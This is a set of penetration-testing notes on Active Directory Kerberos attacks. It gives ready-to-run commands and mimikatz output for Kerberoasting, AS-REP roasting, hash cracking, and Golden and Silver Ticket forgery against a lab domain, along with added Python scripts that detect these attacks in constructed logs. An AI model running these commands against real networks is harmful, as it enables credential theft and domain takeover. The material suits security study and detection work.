Infrastructure penetration testing notes
Kerberos Attacks

Last updated 4 years ago

Relationships and Attack paths

We can use BloodHound to find hidden relationships and attack paths in an Active Directory environment.

From the data collected we can escalate our privileges towards the target, or use tools like aclpwn.

Kerberoasting

The AD PowerShell module can be used to search for users with an SPN set:

Import-Module .\Microsoft.ActiveDirectory.Management.dll -Verbose
Get-ADUser -LdapFilter "(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))" | Format-Table Name, DistinguishedName

Using Nmap:

nmap $TARGET -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='test'

Using Rubeus to gain hashes:

Rubeus.exe kerberoast /outfile:hashes.txt

Use hashcat mode 13100 (Kerberos 5 TGS-REP etype 23) to crack the output:

hashcat -a 0 -m 13100 SPN.hash /wordlists/rockyou.txt

Using impacket:

python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>

AS-REP

Find users whose DONT_REQ_PREAUTH flag (useraccountcontrol bit 4194304) is set, using the AD PowerShell module:

Import-Module .\Microsoft.ActiveDirectory.Management.dll -Verbose

Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name

To exploit run:

.\Rubeus.exe asreproast

Impacket:

# check ASREPRoast for all domain users (credentials required)
python GetNPUsers.py <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

# check ASREPRoast for a list of users (no credentials required)
python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
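As an added defender-side example (not part of the original notes), the script below runs the checks a detection engineer would write for the two techniques above over a constructed set of 4769/4768-style records: Kerberoasting shows up as one account pulling RC4 (etype 0x17) service tickets for many distinct SPNs, and AS-REP roasting as TGTs issued with pre-authentication type 0. The field layout and sample values are assumptions, not real event text:

```python
import re
from collections import defaultdict

# Constructed sample records (not real logs), shaped after the fields of
# Windows security events 4769 (TGS request) and 4768 (TGT request).
SAMPLE_EVENTS = [
    "4769 Account=bob@ETH.LAB Service=MSSQLSvc/db01.eth.lab EncType=0x17 Ip=10.0.0.5",
    "4769 Account=bob@ETH.LAB Service=HTTP/web01.eth.lab EncType=0x17 Ip=10.0.0.5",
    "4769 Account=bob@ETH.LAB Service=CIFS/fs01.eth.lab EncType=0x17 Ip=10.0.0.5",
    "4769 Account=bob@ETH.LAB Service=krbtgt EncType=0x12 Ip=10.0.0.5",
    "4769 Account=alice@ETH.LAB Service=CIFS/fs01.eth.lab EncType=0x12 Ip=10.0.0.9",
    "4768 Account=svc_backup@ETH.LAB PreAuthType=0 EncType=0x17 Ip=10.0.0.5",
    "4768 Account=alice@ETH.LAB PreAuthType=2 EncType=0x12 Ip=10.0.0.9",
]

FIELD = re.compile(r"(\w+)=(\S+)")

def parse_event(line):
    """Split 'ID key=value ...' into a dict; the leading token is the event id."""
    event_id, _, rest = line.partition(" ")
    fields = dict(FIELD.findall(rest))
    fields["id"] = event_id
    return fields

def kerberoast_suspects(lines, threshold=3):
    """Accounts that obtained RC4 (etype 0x17) service tickets for at least
    `threshold` distinct SPNs. Rubeus kerberoast and GetUserSPNs.py request
    RC4 so the TGS can be cracked with hashcat -m 13100; the krbtgt TGS is
    ignored because it is part of a normal logon."""
    spns = defaultdict(set)
    for ev in map(parse_event, lines):
        if (ev["id"] == "4769" and ev.get("EncType") == "0x17"
                and ev.get("Service") != "krbtgt"):
            spns[ev["Account"]].add(ev["Service"])
    return sorted(acct for acct, s in spns.items() if len(s) >= threshold)

def asrep_roast_suspects(lines):
    """Accounts issued a TGT with pre-authentication type 0 and RC4, which is
    what Rubeus asreproast / GetNPUsers.py leave behind for every account
    that has DONT_REQ_PREAUTH set."""
    return sorted({ev["Account"] for ev in map(parse_event, lines)
                   if ev["id"] == "4768" and ev.get("PreAuthType") == "0"
                   and ev.get("EncType") == "0x17"})
```

Accounts that are AES-only produce etype 0x12 requests and will not trip the RC4 rule, which is exactly why removing RC4 from service accounts reduces exposure.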

Golden Ticket

Once you have obtained the krbtgt hash (from DCSync or a DC compromise), the Mimikatz kerberos::golden module handles Golden Tickets.

We need the following parameters:

  • /domain - name of the domain

  • /sid - the SID of the domain (can be obtained from 'whoami /user'; remember to remove the RID)

  • /rc4 - the NTLM hash of krbtgt

  • /user - the user you want to create the new TGT for

  • /id - the RID of the user you are creating the ticket for

  • /ptt - (optional) inject the new ticket into the current session; if omitted the ticket is saved to a file

mimikatz # kerberos::golden /domain:eth.lab /sid:S-1-5-21-98033113-2199257571-2188946577 /rc4:88a4507aae31297a2df7921b1430d781 /user:Administrator /id:500  /ptt
User      : Administrator
Domain    : eth.lab (ETH)
SID       : S-1-5-21-98033113-2199257571-2188946577
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 88a4507aae31297a2df7921b1430d781 - rc4_hmac_nt
Lifetime  : 06/04/2020 14:05:45 ; 04/04/2030 14:05:45 ; 04/04/2030 14:05:45
-> Ticket : ** Pass The Ticket **
 
 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated
 
Golden ticket for 'Administrator @ eth.lab' successfully submitted for current session 

Silver Ticket

Use the 'kerberos::golden' module to forge a TGS as well; we will need to pass the following parameters:

  • /domain: the FQDN of the domain

  • /sid: the SID (Security Identifier) of the domain (whoami /user)

  • /user: target account/computer to impersonate

  • /id: RID of the account you will be impersonating

  • /ptt: optional (will automatically inject the ticket into the current session)

  • /rc4: NTLM hash of the user password/computer password

  • /service: the service we want to access

  • /target: the host that runs the service (see the example below)

Example:

mimikatz # kerberos::golden /sid:S-1-5-21-98033113-2199257571-2188946577-500 /domain:eth.lab /ptt /id:500 /target:WIN-EU4DLP9KRRC.eth.lab /service:cifs /rc4:0c0d4252608be9131c2826a6feaf94b8 /user:Administrator
User      : Administrator
Domain    : eth.lab (ETH)
SID       : S-1-5-21-98033113-2199257571-2188946577-500
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 0c0d4252608be9131c2826a6feaf94b8 - rc4_hmac_nt
Service   : cifs
Target    : WIN-EU4DLP9KRRC.eth.lab
Lifetime  : 03/04/2020 17:00:01 ; 01/04/2030 17:00:01 ; 01/04/2030 17:00:01
-> Ticket : ** Pass The Ticket **
 
 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated
 
Golden ticket for 'Administrator @ eth.lab' successfully submitted for current session
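The two mimikatz summaries above carry the marks a defender looks for in forged tickets: a ten-year lifetime where domain policy issues 10-hour tickets, an RC4 service key, and in the Silver Ticket case a /sid that still carries the RID the Golden Ticket bullet says to remove. As an added example (not code from the page or from mimikatz), the script parses a constructed copy of that summary and reports those indicators; the dd/mm/yyyy date format is an assumption taken from the output shown:

```python
import re
from datetime import datetime, timedelta

# Constructed sample in the shape of the mimikatz kerberos::golden summary
# shown on this page (not captured from a real system); dates assumed dd/mm/yyyy.
SAMPLE_TICKET = """\
User      : Administrator
Domain    : eth.lab (ETH)
SID       : S-1-5-21-98033113-2199257571-2188946577-500
ServiceKey: 0c0d4252608be9131c2826a6feaf94b8 - rc4_hmac_nt
Lifetime  : 03/04/2020 17:00:01 ; 01/04/2030 17:00:01 ; 01/04/2030 17:00:01
"""
DATE_FMT = "%d/%m/%Y %H:%M:%S"
SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)(?:-(\d+))?$")

def parse_summary(text):
    """Turn the 'Label : value' lines into a dict keyed by the trimmed label."""
    out = {}
    for line in text.splitlines():
        label, sep, value = line.partition(":")
        if sep:
            out[label.strip()] = value.strip()
    return out

def split_sid(sid):
    """Return (domain_sid, rid). /sid expects the domain part only; a trailing
    RID must be dropped (the /id parameter carries it instead)."""
    m = SID_RE.match(sid)
    if not m:
        raise ValueError("not a domain SID: " + sid)
    return m.group(1), (int(m.group(2)) if m.group(2) else None)

def forged_ticket_indicators(text, max_ticket_hours=10, max_renew_days=7):
    """Properties a KDC-issued ticket under default domain policy never has
    (10 h ticket life, 7 d renewal); mimikatz forges default to 10 years."""
    t = parse_summary(text)
    start, end, renew = (datetime.strptime(p.strip(), DATE_FMT)
                         for p in t["Lifetime"].split(";"))
    flags = []
    if end - start > timedelta(hours=max_ticket_hours):
        flags.append("lifetime exceeds policy")
    if renew - start > timedelta(days=max_renew_days):
        flags.append("renewal window exceeds policy")
    if t["ServiceKey"].endswith("rc4_hmac_nt"):
        flags.append("rc4 key")  # AES keys are expected on modern domains
    if split_sid(t["SID"])[1] is not None:
        flags.append("sid carries a rid")
    return flags
```

The same lifetime check applies to tickets listed with klist on an endpoint, which is how an oversized Golden Ticket is usually spotted in practice.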

References:

https://newerasec.com/kerberoasting/
https://newerasec.com/as-roast/